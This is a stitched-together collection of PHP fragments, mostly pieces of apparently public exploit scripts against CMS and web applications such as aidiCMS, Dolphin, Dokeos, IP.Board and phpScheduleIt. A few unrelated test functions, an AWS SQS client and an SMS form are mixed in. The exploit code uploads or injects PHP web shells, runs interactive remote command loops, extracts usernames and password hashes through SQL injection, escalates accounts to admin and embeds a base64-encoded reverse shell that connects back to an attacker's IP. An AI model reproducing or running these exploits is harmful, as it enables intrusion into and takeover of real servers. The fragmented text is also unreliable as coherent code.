function upload() { global $host, $path; $connector = "/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php"; $file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv"); foreach ($file_ext as $ext) { print "\n[-] Trying to upload with .{$ext} extension..."; $data = "--12345\r\n"; $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n"; $data .= "Content-Type: application/octet-stream\r\n\r\n"; $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n"; $data .= "--12345--\r\n"; $packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $data; preg_match("/OnUploadCompleted\\((.*),'(.*)'\\)/i", http_send($host, $packet), $html); if (!in_array(intval($html[1]), array(0, 201))) { die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n"); } $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; $html = http_send($host, $packet); if (!eregi("print", $html) and eregi("_code_", $html)) { return $ext; } sleep(1); } return false; }
protected function execute() { $post = "{\"ver\":\"2\",\"pd\":\"map\",\"im\":\"2\",\"os\":\"android\",\"datafile\":\"@\".dirname(__FILE__).\"/20130913100335_861133029533301_XOoGY2L6NDvVw_E3BUS2pe8lB2Lur+3aL7AaN8LHXakeM_2.dat\"}"; $postParam = json_decode($post, true); $data = http_send("http://10.99.33.39:8202/ulog/public/up.php", $postParam); $res = "{\"errno\":0}"; $this->assert_json(__LINE__, $data, $res); }
protected function execute() { $post = "{\"ver\":\"2\",\"pd\":\"map\",\"im\":\"2\",\"os\":\"android\",\"datafile\":\"@/home/map/apps/servertest/lighttpd/htdocs/mysite/application/controllers/20130913100335_861133029533301_XOoGY2L6NDvVw_E3BUS2pe8lB2Lur+3aL7AaN8LHXakeM_2.dat\"}"; $postParam = json_decode($post, true); $data = http_send("http://10.99.33.39:8202/ulog/public/up.php", $postParam); $res = "{\"errno\":0}"; $this->assert_json(__LINE__, $data, $res); }
protected function execute() { $post = "{\"ver\":\"2\",\"pd\":\"map\",\"im\":\"2\",\"os\":\"android\",\"datafile\":\"@" . dirname(__FILE__) . "/20130913100335.dat\"}"; $postParam = json_decode($post, true); $data = http_send("http://10.99.33.39:8202/ulog/public/up.php", $postParam); $res = "{\"errno\":0}"; $this->assert_json(__LINE__, $data, $res); }
function check_query($sql) { global $host, $path; $packet = "GET {$path} HTTP/1.1\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Referer: {$sql} \r\n"; $packet .= "Keep-Alive: 300\r\n"; $packet .= "Connection: keep-alive\r\n\r\n"; $html = http_send($host, $packet); return preg_match("/DENIED/", $html) ? true : false; }
function get_path() { global $host, $path; $packet = "GET {$path}tiki-rss_error.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; if (!preg_match('/in <b>(.*)tiki-rss/', http_send($host, $packet), $m)) { die("\n[-] Path not found!\n"); } return $m[1]; }
function get_path() { global $host, $path; $packet = "GET {$path}../doceboCore/class/class.conf_fw.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; preg_match("/in <b>(.*)<\\/b> on/i", http_send($host, $packet), $found); $ret = substr($found[1], 0, strlen($found[1]) - strlen(strstr($found[1], "docebo"))); $ret .= substr($path, 1); return $ret; }
function sqs_client_enqueue($data, $config) { $result = array(); $err = ''; $variables = array(); $variables['Action'] = 'SendMessage'; $variables['MessageBody'] = json_encode($data); $variables['Version'] = '2012-11-05'; $parsed_url = parse_url($config['sqs_queue_url']); $headers = array(); $headers['Host'] = strtolower($parsed_url['host']); $headers['X-Amz-Date'] = gmdate(DATE_FORMAT_ISO8601_BASIC); $signature = __sqs_client_version_four($config['aws_secret_access_key'], $config['sqs_queue_url'], $variables, $headers, $config['s3_region'], 'post'); $region = empty($config['sqs_region']) ? empty($config['s3_region']) ? 'us-east-1' : $config['s3_region'] : $config['sqs_region']; // fallback to same region as s3 bucket $date_str = substr($headers['X-Amz-Date'], 0, 8); $headers['Authorization'] = "AWS4-HMAC-SHA256 Credential={$config['aws_access_key_id']}/{$date_str}/{$region}/sqs/aws4_request, SignedHeaders=host;x-amz-date, Signature={$signature}"; $post_result = http_send($config['sqs_queue_url'], $variables, $headers); $data = $post_result['result']; if ($data && $config['log_api_response']) { log_file("sqs response:\n" . print_r($data, 1), $config); } if ($post_result['error']) { $err = 'Could not make sqs request ' . $config['sqs_queue_url'] . ' ' . $post_result['error']; } else { if (!$data) { $err = 'Got no response from sqs request'; } else { $xml = @simplexml_load_string($data, 'SimpleXMLElement', LIBXML_NOCDATA | LIBXML_NOENT); if (!is_object($xml)) { $err = 'Could not parse sqs response'; } else { if (sizeof($xml->Error)) { if (!$config['log_api_response']) { log_file("sqs response:\n" . $data, $config); } $err = 'Got error in sqs response'; } else { if (!(is_object($xml->SendMessageResult) && is_object($xml->SendMessageResult->MessageId))) { $err = 'Got no MessageId in sqs response'; } else { $result['id'] = (string) $xml->SendMessageResult->MessageId; } } } } } if ($err) { $result['error'] = $err; } return $result; }
function check_query($sql) { global $host, $path; $payload = "gb_name=null&gb_email=foo%40bar.com&task=insert"; $packet = "POST {$path}index.php?option=guestbook HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Via: {$sql}\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Content-Length: " . strlen($payload) . "\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $payload; return !preg_match("/UNION\\/\\*\\*\\/SELECT/", http_send($host, $packet)); }
function inject_code() { global $host, $path; $code = "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die} ?>"; $payload = "p_user={$code}&p_pass="******"POST {$path}admin/index.php?action=login HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: " . strlen($payload) . "\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $payload; http_send($host, $packet); }
function inject_php() { global $host, $path, $user, $pass; $data = "feed_order=\"]));}print('<<');passthru(base64_decode(\$_SERVER[HTTP_CMD]));print('>>');%23"; $packet = "POST {$path}set-prefs.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: user_name={$user}; user_password_hash={$pass}\r\n"; $packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $data; if (preg_match("/login.php/", http_send($host, $packet))) { die("\n[-] Incorrect username or password!\n"); } }
function login() { global $host, $path, $username, $password; $data = "user={$username}&pass={$password}&submit=1&request_uri=foo"; $packet = "POST {$path}index.php?a=login HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $data; $pattern = "/pass="******"/"; return preg_match($pattern, http_send($host, $packet)); }
function check_target() { global $host, $path, $prefix; print "\n[-] Checking {$host}..."; $packet = "GET {$path}starnet/addons/slideshow_full.php?album_name=%27 HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; if (preg_match("/FROM (.*)_m/", http_send($host, $packet), $match)) { print "vulnerable!\n"; } else { die("not vulnerable!\n\n[-] Exploit failed...probably magic_quotes_gpc = on\n"); } $prefix = $match[1]; }
function check_target() { // see if MySQL version is >= 4.1 (subqueries support) or other error global $host, $path; print "\n[-] Checking {$host}..."; $pck = "GET " . $path . "new_images.php?order=id,(SELECT/**/1) HTTP/1.1\r\n"; $pck .= "Host: " . $host . "\r\n"; $pck .= "Keep-Alive: 300\r\n"; $pck .= "Connection: keep-alive\r\n\r\n"; $buff = http_send($host, $pck); if (!strpos($buff, "The LinPHA developers")) { die("\n\n[-] Error... Probably wrong MySQL version!\n"); } else { print " OK!\n"; } }
print "\n+------------------------------------------------------------+\n"; if ($argc < 5) { print "\nUsage......: php {$argv['0']} <host> <path> <username> <password>\n"; print "\nExample....: php {$argv['0']} localhost / user pass"; print "\nExample....: php {$argv['0']} localhost /dolphin/ user pass\n"; die; } $host = $argv[1]; $path = $argv[2]; $payload = "ID={$argv[3]}&Password={$argv[4]}"; $packet = "POST {$path}member.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: " . strlen($payload) . "\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; if (!preg_match("/memberID=([0-9]+).*memberPassword=([0-9a-f]+)/is", http_send($host, $packet), $m)) { die("\n[-] Login failed!\n"); } $phpcode = "1);error_reporting(0);passthru(base64_decode(\$_SERVER[HTTP_CMD])"; $packet = "GET {$path}member_menu_queries.php?action=get_bubbles_values&bubbles=Friends:{$phpcode} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: memberID={$m[1]}; memberPassword={$m[2]}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while (1) { print "\ndolphin-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") { break; } preg_match("/\r\n\r\n(.*)\\{\"Friends/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); }
function random_mkdir() { global $host, $path, $fileman, $rootdir; $dirname = uniqid(); $payload = "new_folder={$dirname}¤tFolderPath={$rootdir}"; $packet = "POST {$path}{$fileman}/ajax_create_folder.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: " . strlen($payload) . "\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; http_send($host, $packet); return $dirname; }
return stream_get_contents($sock); } print "\n+-----------------------------------------------------+"; print "\n| aidiCMS v3.55 Remote Code Execution Exploit by EgiX |"; print "\n+-----------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php {$argv['0']} <host> <path>\n"; print "\nExample....: php {$argv['0']} localhost /"; print "\nExample....: php {$argv['0']} localhost /aidicms/\n"; die; } $host = $argv[1]; $path = $argv[2]; $payload = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>"; $packet = "POST {$path}modul/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: " . strlen($payload) . "\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; http_send($host, $packet); $packet = "GET {$path}modul/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while (1) { print "\naidicms-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") { break; } preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); }
$headers .= "Content-Length: " . strlen($payload) . "\r\n\r\n"; $headers .= $payload; fclose(http_send($host, 80, $headers)); sleep(2); print "Granting admin privileges for user [ {$newuser} ]\n"; $headers = "GET {$path}admin/review/staff/index.php HTTP/1.0\r\n"; $headers .= "Host: {$host}\r\n"; $headers .= "Connection: close\r\n"; $headers .= "Cookie: AUTH_COOKIE={$cookie}\r\n\r\n"; preg_match_all('/php\\?u=(\\d+)/', http_recv(http_send($host, 80, $headers)), $matches); if (!is_numeric(max($matches[1]))) { die('Failed.'); } sleep(2); $payload = "rdo_type=staff&name=1&surname=2&email=3&password={$newpass}&chk_admin=on&save=" . urlencode('Save Changes'); $headers = "POST {$path}admin/edit/index.php?u=" . max($matches[1]) . " HTTP/1.0\r\n"; $headers .= "Host: {$host}\r\n"; $headers .= "Connection: close\r\n"; $headers .= "Cookie: AUTH_COOKIE={$cookie}\r\n"; $headers .= "Content-Type: application/x-www-form-urlencoded\r\n"; $headers .= "Content-Length: " . strlen($payload) . "\r\n\r\n"; $headers .= $payload; fclose(http_send($host, 80, $headers)); print "Success!\n\n"; print "http://{$host}{$path}login.php\n"; print "user: {$newuser}\n"; print "pass: {$newpass}\n"; ?> # ### [ dun / 2012 ] ###############################
function set_NowritableServer() { global $host, $path, $prefix, $pwd; // we need to set $NowritableServer=1 in /option/php-stats_mode.php $s1 = "/con scrittura di files sul Server/"; $s2 = "/the write files on server mode/"; $pck = "GET {$path}admin.php?action=preferenze HTTP/1.1\r\n"; $pck .= "Host: {$host}\r\n"; $pck .= "Cookie: pass_cookie={$pwd}\r\n"; $pck .= "Keep-Alive: 300\r\n"; $pck .= "Connection: keep-alive\r\n\r\n"; $html = http_send($host, $pck); if (preg_match($s1, $html) || preg_match($s2, $html)) { $data = "change_mode=1"; $pck = "POST {$path}admin.php HTTP/1.1\r\n"; $pck .= "Host: {$host}\r\n"; $pck .= "Content-Type: application/x-www-form-urlencoded\r\n"; $pck .= "Content-Length: " . strlen($data) . "\r\n"; $pck .= "Keep-Alive: 300\r\n"; $pck .= "Connection: keep-alive\r\n\r\n"; $pck .= $data; http_send($host, $pck); } }
$packet .= "Connection: close\r\n\r\n"; $packet .= $data; preg_match("/OnUploadCompleted\\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html); if (!in_array(intval($html[1]), array(0, 201))) { die("\n[-] Upload failed! (Error {$html[1]})\n"); } else { print "\n[-] Shell uploaded to {$html[2]}...starting it!\n"; } define(STDIN, fopen("php://stdin", "r")); while (1) { print "\nstack-shell# "; $cmd = trim(fgets(STDIN)); if ($cmd != "exit") { $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: " . base64_encode($cmd) . "\r\n"; $packet .= "Connection: close\r\n\r\n"; $output = http_send($host, $packet); if (eregi("print", $output) || !eregi("_code_", $output)) { die("\n[-] Exploit failed...\n"); } $shell = explode("_code_", $output); print "\n{$shell[1]}"; } else { break; } } ?> # milw0rm.com [2008-05-29]
<head> <title>SMS Message Sender</title> </head> <body bgcolor="#FFFFFF" text="#000000"> <?php include "config.inc"; include "functions.inc"; echo $sendTo; echo "<hr>"; echo $message; exit; if ($submit) { echo "Sending the SMS Text message <b>\"{$text}\"</b> to the phone <b>{$to}</b>...<br>\n"; $URL = "/cgi-bin/sendsms?username="******"&password="******"&from=" . GLOBAL_SENDER . "&to={$to}&text=" . urlencode($text); http_send($URL, SENDSMS_PORT); echo "<address><a href=\"{$PHP_SELF}\">Back to Send SMS</a></address>\n"; } else { ?> <h1>SMS Message Sender</h1> <form name="sendsms" method="post" action="<?php echo "{$PHP_SELF}"; ?> "> <p> Telephone number: <br> <input type="text" size="30" name="to"> </p> <p>
$packet = "GET {$path}index.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; $_prefix = preg_match('/Cookie: (.+)session/', http_send($host, $packet), $m) ? $m[1] : ''; class db_driver_mysql { public $obj = array('use_debug_log' => 1, 'debug_log' => 'cache/sh.php'); } # Super bypass by @i0n1c $payload = urlencode('a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2:{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"cache/sh.php";}}}'); $phpcode = '<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?>'; $packet = "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: {$_prefix}member_id={$payload}\r\n"; $packet .= "Connection: close\r\n\r\n"; http_send($host, $packet); $packet = "GET {$path}cache/sh.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; if (preg_match('/<\\?error/', http_send($host, $packet))) { die("\n[-] short_open_tag disabled!\n"); } while (1) { print "\nipb-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") { break; } $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); }
protected function execute() { $data = http_send("http://10.99.33.40:8080/loc-monitor/slave.php?type=reg&ts=10982345&sign=cc&cuid=SLAVE3559A98E6E0894F17F08F4877CD|933 861000141225&os=android&pt=1&ap=map", ""); $res = "{\"error\":0,\"msg\":\"\",\"data\":{\"sid\":\"25ce7a038f015df67e96231000141225\"},\"t\":23}"; $this->assert_json(__LINE__, $data, $res); }
function upload() { global $host, $path; $payload = "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"Submit\"\r\n\r\n\"Send\"\r\n"; $payload .= "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"poc.php\"\r\n\r\n"; $payload .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n"; $payload .= "--o0oOo0o--\r\n"; $packet = "POST {$path}?L=interact.file&id=0 HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: " . strlen($payload) . "\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $payload; http_send($host, $packet); $packet = "GET {$path}system/cache/temp/ HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; if (preg_match("/[0-9]*_poc.php/", http_send($host, $packet), $match)) { return $match[0]; } die("\n[-] Directory listing denied\n"); }
$table = $reg[1]; } $ex = str_replace("[N]", $k, $sql); $txt = getContent(http_send($host, makePacket($path, $ex, $host))); } } print "\n\n [] Table = {$table}\n\n"; if (!$uid) { $sql = "-1+union+select+concat({$s},uid,0x3a,uname,0x3a,pass,{$s}),0+from+{$table}+limit+[N],1"; } else { $sql = "-1+union+select+concat({$s},uid,0x3a,uname,0x3a,pass,{$s}),0+from+{$table}+where+uid={$uid}+limit+[N],1"; } $regs = array(); $regex = $string . "(.+)" . $string; $n = 0; $ex = str_replace("[N]", $n, $sql); $pck = makePacket($path, $ex, $host); $resp = http_send($host, $pck); $txt = getContent($resp); while (ereg($regex, $txt, $regs)) { $users .= $regs[1] . "\n"; print $regs[1] . "\n"; $n++; $pck = makePacket($path, str_replace("[N]", $n, $sql), $host); $resp = http_send($host, $pck); $txt = getContent($resp); } $write = "\n\nVis Intelligendi" . "\n E-Xooport 3.1 SQL Injection Exploit\n" . "http://vis-intelligendi.co.cc\n" . "Host : {$host}\n" . "Path : {$path}\n" . "http://{$host}{$path}{$sql}\n\n" . "table: {$table}\n\n" . $users . "\n\n Vis Intelligendi Magia"; fwrite(fopen("exooport_log.txt", "w+"), $write); print "Check exooport_log.txt"; }
die("\n[-] Exploit failed...\n"); } define(STDIN, fopen("php://stdin", "r")); while (1) { print "\nfluxcms-shell# "; $cmd = trim(fgets(STDIN)); if ($cmd != "exit") { $packet = "GET {$path}webinc/bxe/scripts/loadsave.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: " . base64_encode($cmd) . "\r\n"; $packet .= "Connection: close\r\n\r\n"; $output = http_send($host, $packet); if (!preg_match("/_code_/", $output)) { die("\n[-] Exploit failed...\n"); } $shell = explode("_code_", $output); print "\n" . $shell[1]; } else { break; } } // backup the original script $packet = "GET {$path}webinc/bxe/scripts/loadsave.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Back:\r\n"; $packet .= "Connection: close\r\n\r\n"; http_send($host, $packet); ?> # milw0rm.com [2008-06-09]
print "\n| Dokeos LMS <= 1.8.5 (reverse shell) Code Injection Exploit by EgiX |"; print "\n+--------------------------------------------------------------------+\n\n"; if ($argc < 4) { print "\nUsage......: php {$argv['0']} <host> <path> <local IP> [port]\n"; print "\nExample....: php {$argv['0']} localhost /dokeos/ 192.168.0.2"; print "\nExample....: php {$argv['0']} localhost / 192.168.0.2 12345\n"; die; } $host = $argv[1]; $path = $argv[2]; $ip = $argv[3]; $port = isset($argv[4]) ? (int) $argv[4] : 4444; // reverse shell based on http://pentestmonkey.net/tools/php-reverse-shell/ $code = "c2V0X3RpbWVfbGltaXQoMCk7CmluaV9zZXQoJ2RlZmF1bHRfc29ja2V0X3RpbWVvdXQnLCA1KTsKC" . "iRpcCA9ICRfU0VSVkVSW0hUVFBfSVBdOwokcG9ydCA9ICRfU0VSVkVSW0hUVFBfUE9SVF07CiRjaH" . "Vua19zaXplID0gMjA0ODsKCmlmICghKCRzb2NrID0gZnNvY2tvcGVuKCRpcCwgJHBvcnQpKSkgZGl" . "lKCdbZXJyXUNvbm5lY3Rpb24gdG8geyRpcH06eyRwb3J0fSByZWZ1c2VkJyk7CiRkZXNjcmlwdG9y" . "c3BlYyA9IGFycmF5KDAgPT4gYXJyYXkoJ3BpcGUnLCAncicpLCAxID0+IGFycmF5KCdwaXBlJywgJ" . "3cnKSwgMiA9PiBhcnJheSgncGlwZScsICd3JykpOwppZiAoIWlzX3Jlc291cmNlKCgkcHJvY2Vzcy" . "A9IHByb2Nfb3BlbignL2Jpbi9zaCAtaScsICRkZXNjcmlwdG9yc3BlYywgJHBpcGVzKSkpKSBkaWU" . "oJ1tlcnJdQ2FuXCd0IHNwYXduIHNoZWxsJyk7CgpzdHJlYW1fc2V0X2Jsb2NraW5nKCRwaXBlc1sw" . "XSwgMCk7CnN0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGVzWzFdLCAwKTsKc3RyZWFtX3NldF9ibG9ja" . "2luZygkcGlwZXNbMl0sIDApOwpzdHJlYW1fc2V0X2Jsb2NraW5nKCRzb2NrLCAwKTsKCndoaWxlIC" . "ghZmVvZigkc29jaykgJiYgIWZlb2YoJHBpcGVzWzFdKSkgewoJJHJlYWRfYSA9IGFycmF5KCRzb2N" . "rLCAkcGlwZXNbMV0sICRwaXBlc1syXSk7CgkkbnVtX2NoYW5nZWRfc29ja2V0cyA9IHN0cmVhbV9z" . "ZWxlY3QoJHJlYWRfYSwgJHdyaXRlX2EsICRlcnJvcl9hLCBudWxsKTsKCglpZiAoaW5fYXJyYXkoJ" . "HNvY2ssICRyZWFkX2EpKSB7CgkJJGlucHV0ID0gZnJlYWQoJHNvY2ssICRjaHVua19zaXplKTsKCQ" . "lmd3JpdGUoJHBpcGVzWzBdLCAkaW5wdXQpOwoJfQoJaWYgKGluX2FycmF5KCRwaXBlc1sxXSwgJHJ" . "lYWRfYSkpIHsKCQkkaW5wdXQgPSBmcmVhZCgkcGlwZXNbMV0sICRjaHVua19zaXplKTsKCQlmd3Jp" . "dGUoJHNvY2ssICRpbnB1dCk7Cgl9CglpZiAoaW5fYXJyYXkoJHBpcGVzWzJdLCAkcmVhZF9hKSkge" . "woJCSRpbnB1dCA9IGZyZWFkKCRwaXBlc1syXSwgJGNodW5rX3NpemUpOwoJCWZ3cml0ZSgkc29jay" . "wgJGlucHV0KTsKCX0KfQoKZmNsb3NlKCRzb2NrKTsKZmNsb3NlKCRwaXBlc1swXSk7CmZjbG9zZSg" . "kcGlwZXNbMV0pOwpmY2xvc2UoJHBpcGVzWzJdKTsKcHJvY19jbG9zZSgkcHJvY2Vzcyk7CmRpZTsK"; $packet = "GET {$path}whoisonline.php?tablename_column=0];}eval(base64_decode(\$_SERVER[HTTP_CODE]));%23 HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Code: {$code}\r\n"; $packet .= "IP: {$ip}\r\n"; $packet .= "Port: {$port}\r\n"; $packet .= "Connection: close\r\n\r\n"; $response = http_send($host, $packet); if (preg_match("/\\[err\\](.*)/", $response, $match)) { die("[-] Exploit failed ({$match[1]})\n"); } if (preg_match("/<\\/html>/", $response)) { die("[-] Exploit failed (No users online)\n"); } ?> # milw0rm.com [2009-04-21]
function check_plugin() { global $host, $path, $sid; $packet = "GET {$path}%s HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: pwg_id={$sid}\r\n"; $packet .= "Connection: close\r\n\r\n"; // check if the event_tracer plugin isn't installed if (preg_match("/not active/", http_send($host, sprintf($packet, "admin.php?page=plugin§ion=event_tracer/event_list.php")))) { http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=install")); http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=activate")); } }
function upload() { global $host, $path, $uploaddir, $file_ext; foreach ($file_ext as $ext) { print "\n[-] Trying to upload with .{$ext} extension..."; $data = "--12345\r\n"; $data .= "Content-Disposition: form-data; name=\"userfile\"; filename=\".php.{$ext}\"\r\n"; $data .= "Content-Type: application/octet-stream\r\n\r\n"; $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n"; $data .= "--12345--\r\n"; $packet = "POST {$path}modules/FileManager/postlet/javaUpload.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $data; $html = http_send($host, $packet); if (!eregi("POSTLET:YES", $html)) { die("\n[-] Upload failed!\n"); } $packet = "GET {$path}modules/FileManager/postlet/{$uploaddir}.php.{$ext} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; $html = http_send($host, $packet); if (!eregi("print", $html) and eregi("_code_", $html)) { return $ext; } sleep(1); } return false; }
print "\nUsage......: php {$argv['0']} host path\n"; print "\nExample....: php {$argv['0']} localhost /"; print "\nExample....: php {$argv['0']} localhost /phpscheduleit/\n"; die; } $host = $argv[1]; $path = $argv[2]; $payload = "btnSubmit=1&start_date=1').\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die};%%23"; $packet = "POST {$path}reserve.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Referer: {$path}reserve.php\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Content-Length: " . (strlen($payload) - 1) . "\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $payload; while (1) { print "\nphpscheduleit-shell# "; $cmd = trim(fgets(STDIN)); if ($cmd != "exit") { $html = http_send($host, sprintf($packet, base64_encode($cmd))); $shell = explode("_code_", $html); preg_match("/_code_/", $html) ? print "\n{$shell[1]}" : die("\n[-] Exploit failed...\n"); } else { break; } } ?> # milw0rm.com [2008-10-01]